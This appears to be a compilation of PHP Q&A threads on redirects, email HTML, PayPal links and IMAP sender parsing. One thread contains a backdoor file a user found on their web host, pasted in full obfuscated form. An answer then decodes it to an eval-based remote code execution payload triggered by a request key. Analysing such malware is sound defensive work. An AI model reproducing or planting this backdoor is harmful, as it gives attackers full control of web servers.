I'm setting a variable based on an array. When I echo the variable it displays on the screen, however when I try to add it to a Header Location it doesn't show up in the URL of the next page - everything else does:
$myid = $selected_cat3[0]['id'];
Header("Location:/cat-dashboard/cat-results/?catID=" . $myid
. "&question1=" . $_GET['question1'] . "&question2=" . $_GET['question2']
. "&question3=" . $_GET['question3'] . "&question4=" . $_GET['question4']
. "&question5=" . $_GET['question5'] . "&question6=" . $_GET['question6']
. "&question7=" . $_GET['question7'] . "&question8=" . $_GET['question8']);
This is the generated url:
/cat-dashboard/cat-results/?catID=&question1=0&question2=3&question3=1&question4=1&question5=1&question6=2&question7=1&question8=3
Am I doing something wrong? It doesn't show even if I use: $myid = "1";
I'm trying to send email(s) after submitting a form, I want to achieve:
1) If field is empty then no need to send table row to mail. Just like the field age below is optional, user might add his/her age or might not, so how to do it in switmail $message->addPart('Message','text/html') function.
I tried but failed saying:
Parse error: syntax error, unexpected 'if' (T_IF) in...
The issue is only with if.. without if statement everything works fine.
$content = '<table>
...
<tr><td>' . $_POST["firstname"] . '<td></tr>
' . if(!empty($_POST["age"])) {
. '<tr><td>' . $_POST["age"] . '</td></tr>' .
}
...
<table>';
$message->addPart($content, 'text/html');
Do it outside of the $content variable.
$age = (!empty($_POST["age"])) ? '<tr><td>' . $_POST["age"] . '</td></tr>' : '';
$content = '<table>
...
<tr><td>' . $_POST["firstname"] . '<td></tr>'
. $age . '
...
<table>';
About a week ago, I noticed there was a seemingly randomly named PHP file that had appeared in the root folder of my shared web hosting. The name of the file is "hvkqwvkj.php" and I very stupidly removed it before I looked at the owner/group and permission information. I'd like to know what this is and how it got there. Here is the contents of that file:
<?php
$circulated='ad,$E)eNf'; $chickadees= 't';$glissade ='TeUs';$antoinette= '6'; $lithic='o'; $hydrophobic='TR)iec$$W';$blaspheming='G';$eerily= 'u';$diagrammer =']A))eDO'; $huh= '(rCS/H:s';$din = 'g'; $harri = '.';$housed ='S';$browbeating = 'E(K+Nl';$deniable = 'dew_'; $flared='[';$baseboards = 'R;I';$conversed= '-'; $jammed = 'C'; $confident ='s';$homed ='a'; $bullock ='?';$asdf = 'T$v]';$debugs= 'LV9[U';$cheaters='$'; $juice = ';';$impropriety=')Hf6]tNar'; $fluently= '>(e;_sa'; $antagonism='t';
$jaquith= '"i_K4W';$canal ='(';$bookie='i';
$envies ='_n';$copyright='Pns#iSd'; $hampers='$'; $incontrovertible ='Te['; $irking ='?';$citadel ='iRy=';
$economizing= 'b'; $campanile = 'y'; $awn = 'N'; $compacting='c'; $journalist= 'O'; $evaluate = 'nQ:'; $booking = 'e'; $dolt= '_Q';$bottoming='U';$grabs= 'H';$covers ='(rrta';$breakfasted ='T_"(_uTM_';$confectionery = 'A'; $bolstered = 'E'; $kitti='a'; $kali ='neWn';$jersey ='e'; $fewer= 'a';
$earthmove ='a';$forgivable='1'; $hello =';Sru';$forwent = 'g';$gingham = '?';$fanatic='ot(RstP';$levee='S';$baser = 'B_,"c';$constructs= 'rai';$deletions='u';$attempters='g"sss_';$dispatcher ='ra=';$ken =')';$contrivance = '[D)dae'; $chrome ='i';$glutting='I<'; $devoutness= ';';$foible= '8';
$diagonally='$5D(vn';
$beauregard ='S';$ines='te]ee'; $imogen = 's';
$irene ='("as3:0$r';$grassier ='4';
$consortium ='r'; $appliance ='S'; $histochemistry= 'A'; $beamer='v';$enchain ='s'; $assaults= 'E';$davida='dNe'; $foamed= 'E)n';$cavity='=l';
$drudge='F';
$arraigning= 'p_E "i'; $firmware='",)a(';$jeanine= ')';
$equivalently ='"7$p'; $biller='m'; $likeness= 'i'; $closest = 'OP(vVrwJ$'; $commissioner='rU)o2';
$kaycee= 'c';$fanni = $kaycee['0'] .$commissioner[0] .$davida[2] .$firmware['3'].
$ines['0'] . $davida[2] . $arraigning['1'].$impropriety[2].$deletions. $foamed['2'] . $kaycee['0'].$ines['0']. $likeness . $commissioner[3].$foamed['2'];
$bob=$arraigning[3];
$druggist= $fanni ($bob,$davida[2] . $closest['3'].$firmware['3']. $cavity['1'] .$closest['2'].$firmware['3']. $commissioner[0]. $commissioner[0].
$firmware['3']. $campanile .$arraigning['1'].$equivalently['3'] . $commissioner[3] .$equivalently['3'] .
$closest['2'].$impropriety[2] .$deletions . $foamed['2'] . $kaycee['0'].$arraigning['1'] .
$attempters['0'] .$davida[2]. $ines['0'] .$arraigning['1']. $firmware['3'] . $commissioner[0] .$attempters['0'].$enchain .
$closest['2'] .$commissioner['2'] . $commissioner['2'] .$commissioner['2'] . $devoutness);$druggist ($closest['2'] ,$gingham,$attempters['0'],$dinnie['2'] ,$gwenneth ,$biller, $disdains[2],$closest['0'],$harri , $closest['8'] .$likeness. $cavity['0'].$firmware['3'] . $commissioner[0].
$commissioner[0].$firmware['3'] .
$campanile . $arraigning['1']. $biller.
$davida[2] .
$commissioner[0] . $attempters['0']. $davida[2] .$closest['2'] .$closest['8'] .$arraigning['1'].
$fanatic['3'] . $arraigning['2'].$dolt[1] .$commissioner['1'] .
$arraigning['2']. $appliance . $breakfasted[6]. $firmware['1'] .
$closest['8']. $arraigning['1'].
$jammed.$closest['0'].$closest['0'] .$jaquith['3'].
$glutting['0'] .
$arraigning['2']. $firmware['1']. $closest['8'] . $arraigning['1'].$appliance. $arraigning['2'].
$fanatic['3'] .$closest['4']. $arraigning['2'] . $fanatic['3'].$commissioner['2'] .
$devoutness. $closest['8'].$firmware['3']. $cavity['0'] . $likeness.$enchain. $enchain.
$davida[2] .
$ines['0'] . $closest['2'] .
$closest['8'] .$likeness. $contrivance[0].
$equivalently['0']. $foamed['2'] . $davida['0'].
$enchain .
$enchain.$closest['6'] .$firmware['3']. $foamed['2'].$deletions .$equivalently['0']. $ines[2] . $commissioner['2'].$gingham .
$closest['8'] .$likeness .$contrivance[0] .
$equivalently['0'].
$foamed['2'] . $davida['0'] .$enchain .$enchain .$closest['6'].$firmware['3'].$foamed['2'].$deletions .
$equivalently['0'] .
$ines[2] . $irene['5'] . $closest['2'].$likeness . $enchain. $enchain.$davida[2].$ines['0'] .$closest['2'].$closest['8'] . $likeness. $contrivance[0] .$equivalently['0'] . $grabs.$breakfasted[6] . $breakfasted[6] . $closest['1'] .$arraigning['1'] . $davida['1'].$diagonally[2] . $appliance.
$appliance .
$kali['2'].$histochemistry . $davida['1'].$commissioner['1'] . $equivalently['0'] . $ines[2].$commissioner['2'].$gingham. $closest['8'].
$likeness.$contrivance[0].
$equivalently['0'].$grabs .$breakfasted[6].$breakfasted[6] . $closest['1']. $arraigning['1'].$davida['1']. $diagonally[2] .$appliance .
$appliance. $kali['2'].$histochemistry . $davida['1'].$commissioner['1'].$equivalently['0'] . $ines[2] . $irene['5'].
$davida['0'] . $likeness.$davida[2]. $commissioner['2'].$devoutness.$davida[2]. $closest['3'] .$firmware['3'] .
$cavity['1'] .$closest['2'] . $enchain. $ines['0'] . $commissioner[0] .
$commissioner[0] .$davida[2].$closest['3'] . $closest['2']. $economizing .$firmware['3'].
$enchain.$davida[2] .$impropriety['3']. $grassier .$arraigning['1']. $davida['0'].$davida[2].$kaycee['0']. $commissioner[3].$davida['0'] .
$davida[2] .
$closest['2'].
$enchain.$ines['0'] .$commissioner[0] . $commissioner[0]. $davida[2] .$closest['3'] . $closest['2'].$closest['8']. $firmware['3'].$commissioner['2'].
$commissioner['2']. $commissioner['2'] . $commissioner['2'].
$devoutness );
I was able to parse out the actual coding.
The file employs obscurity to avoid detection. It defines a function and then uses eval to execute it.
Here is the payload (the important bit).
//Take all types of request data and merge them
//This opens up many types of attack vectors
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER);
//Look for a specific injected key called "ndsswanu" or HTTP_NDSSWANU and records its value if its set
$a = isset($i["ndsswanu"]
) ? $i["ndsswanu"] : (isset($i["HTTP_NDSSWANU"]) ? $i["HTTP_NDSSWANU"] : die);
//execute it
//iirc the reason for the double reverse is to avoid some characters being improperly encoded in base64.
//This statement runs any php code sent in the "ndsswanu" or HTTP_NDSSWANU key.
eval(strrev(base64_decode(strrev($a))));
You were correct to remove it immediately, however this is only a symptom of a greater problem. How the script got there is of a much larger concern.
This code would allow an attacker to remotely run any php code via a varied amount of attack vectors.
I have just a quick question. i was using a normal html link tag to redirect to a paypal checkout page and it was working fine even when i had php inside the url. but when i was using it in a php header
the url cuts off where i enter the php.
header('location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=<? echo $product . " " . $server ?>&amount=<? echo $xprice1; ?>%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest');
You are placing the PHP code inside of the location redirect as a string. The code is not being evaluated as PHP.
Try this instead:
<?php
$url = "https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=" . $product . " " . $server ."&amount=" . $xprice1 . "%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest";
header('location: ' . $url);
Or, you could keep it in one line like so:
<?php
header('location: ' . "https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=" . $product . " " . $server ."&amount=" . $xprice1 . "%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest");
header('location: https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=XXXX&lc=UK&item_name=<? echo $product' . " " . '$server ?>&amount=<? echo $xprice1; ?>%2e00¤cy_code=GBP&button_subtype=services&no_note=0&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHostedGuest');
This may solve your problem. Please dont forget to tick the answer right if it works.
How do I retrieve the email address from an email with imap_open?
If the sender name is known I get the sender name instead of the email address if I use the 'from' parameter.
Code: http://gist.github.com/514207
$header = imap_headerinfo($imap_conn, $msgnum);
$fromaddr = $header->from[0]->mailbox . "#" . $header->from[0]->host;
I battled with this as well but the following works:
// Get email address
$header = imap_header($imap, $result); // get first mails header
echo '<p>Name: ' . $header->fromaddress . '<p>';
echo '<p>Email: ' . $header->senderaddress . '<p>';
I had used imap_fetch_overview() but the imap_header() gave me all the information I needed.
Worst case, you can parse the headers yourself with something like:
<?php
$headers=imap_fetchheader($imap, $msgid);
preg_match_all('/([^: ]+): (.+?(?:\r\n\s(?:.+?))*)\r\n/m', $headers, $matches);
?>
$matches will contain 3 arrays:
$matches[0] are the full-lines (such as "To: user#user.com\r\n")
$matches[1] will be the header (such as "To")
$matches[2] will be the value (user#user.com)
Got this from: http://www.php.net/manual/en/function.imap-fetchheader.php#82339
Had same issue as you....had to piece it together, don't know why it's such gonzoware.
Untested example here:
$mbox = imap_open(....)
$MN=$MC->Nmsgs;
$overview=imap_fetch_overview($mbox,"1:$MN",0);
$size=sizeof($overview);
for($i=$size-1;$i>=0;$i--){
$val=$overview[$i];
$msg=$val->msgno;
$header = imap_headerinfo ( $mbox, $msg);
echo '<p>Name / Email Address: ' . $header->from[0]->personal ." ".
$header->from[0]->mailbox ."#". $header->from[0]->host. '<p></br>';
}
imap_close($mbox);
imap_fetch_overview could be what you're looking for: http://www.php.net/manual/en/function.imap-fetch-overview.php
An example of use can be found here: http://davidwalsh.name/gmail-php-imap, specifically
echo $overview[0]->from;
This function is simple, but has limitations. A more exhaustive version is in imap_headerinfo ( http://www.php.net/manual/en/function.imap-headerinfo.php ) which can return detailed arrays of all header data.
Had trouble until I spotted that the $header is an array of stdClass Objects. The following 2 lines worked:
$header=imap_fetch_overview($imap,$countClients,FT_UID);
$strAddress_Sender=$header[0]->from;
Full working code with an online example
Extract email addresses list from inbox using PHP and IMAP
inbox-using-php-and-imap
I think all you need is just to copy the script.
I am publishing two core functions of the code here as well (thanks to Eineki's comment)
function getAddressText(&$emailList, &$nameList, $addressObject) {
$emailList = '';
$nameList = '';
foreach ($addressObject as $object) {
$emailList .= ';';
if (isset($object->personal)) {
$emailList .= $object->personal;
}
$nameList .= ';';
if (isset($object->mailbox) && isset($object->host)) {
$nameList .= $object->mailbox . "#" . $object->host;
}
}
$emailList = ltrim($emailList, ';');
$nameList = ltrim($nameList, ';');
}
function processMessage($mbox, $messageNumber) {
echo $messageNumber;
// get imap_fetch header and put single lines into array
$header = imap_rfc822_parse_headers(imap_fetchheader($mbox, $messageNumber));
$fromEmailList = '';
$fromNameList = '';
if (isset($header->from)) {
getAddressText($fromEmailList, $fromNameList, $header->from);
}
$toEmailList = '';
$toNameList = '';
if (isset($header->to)) {
getAddressText($toEmailList, $toNameList, $header->to);
}
$body = imap_fetchbody($mbox, $messageNumber, 1);
$bodyEmailList = implode(';', extractEmail($body));
print_r(
',' . $fromEmailList . ',' . $fromNameList
. ',' . $toEmailList . ',' . $toNameList
. ',' . $bodyEmailList . "\n"
);
}